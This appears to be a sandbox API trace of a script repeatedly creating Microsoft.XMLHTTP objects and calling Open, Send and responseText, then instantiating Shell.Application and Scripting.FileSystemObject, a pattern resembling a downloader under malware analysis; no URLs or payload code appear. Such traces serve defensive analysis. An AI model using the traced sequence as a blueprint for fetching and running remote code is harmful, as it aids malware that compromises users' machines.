	[0238.075] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0238.075] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0238.076] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0238.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0238.076] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0238.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0238.076] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0238.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0238.076] longjmp () 
	[0238.076] longjmp () 
	[0238.076] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0238.076] SysStringLen (param_1=0x0) returned 0x0
	[0238.076] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0238.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0238.076] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0238.076] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0238.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0238.076] ??2@YAPEAX_K@Z () returned 0x62f330
	[0238.076] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0238.076] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0238.076] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0238.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0238.077] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0238.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0238.077] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0238.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0238.077] longjmp () 
	[0238.077] longjmp () 
	[0238.077] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0238.077] SysStringLen (param_1=0x0) returned 0x0
	[0238.077] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0238.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0238.077] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c10) returned 0x0
	[0238.077] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0238.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74e8) returned 0x0
	[0238.077] ??2@YAPEAX_K@Z () returned 0x62f310
	[0238.077] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74e8, pUnkSite=0x62f310) 
	[0238.077] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0238.077] XMLHTTPRequest:IUnknown:Release (This=0x49c74e8) returned 0x0
	[0238.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c10) returned 0x0
	[0238.077] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c10) returned 0x3
	[0238.078] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0238.078] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0238.078] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0238.078] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0238.078] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0238.078] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0238.854] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0238.854] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0238.854] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0238.854] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0238.854] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0238.854] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0238.854] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0238.854] SysStringLen (param_1=0x0) returned 0x0
	[0238.854] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0238.854] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0238.855] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0238.855] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0238.855] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0238.855] ??2@YAPEAX_K@Z () returned 0x62f350
	[0238.855] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0238.855] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0238.855] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0238.855] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0238.855] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0238.855] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0238.855] SysStringLen (param_1=0x0) returned 0x0
	[0238.855] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0238.858] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0238.858] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0238.859] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0238.859] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0238.859] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0238.859] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0239.060] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0239.060] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0239.060] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0239.061] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.061] SysStringLen (param_1=0x0) returned 0x0
	[0239.061] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.062] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c10) returned 0x0
	[0239.062] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0239.062] ??2@YAPEAX_K@Z () returned 0x62f310
	[0239.062] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0239.062] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.062] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0239.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c10) returned 0x0
	[0239.062] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c10) returned 0x3
	[0239.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.062] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.065] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.065] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.065] SysStringLen (param_1=0x0) returned 0x0
	[0239.065] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.065] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.065] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0239.065] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.065] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
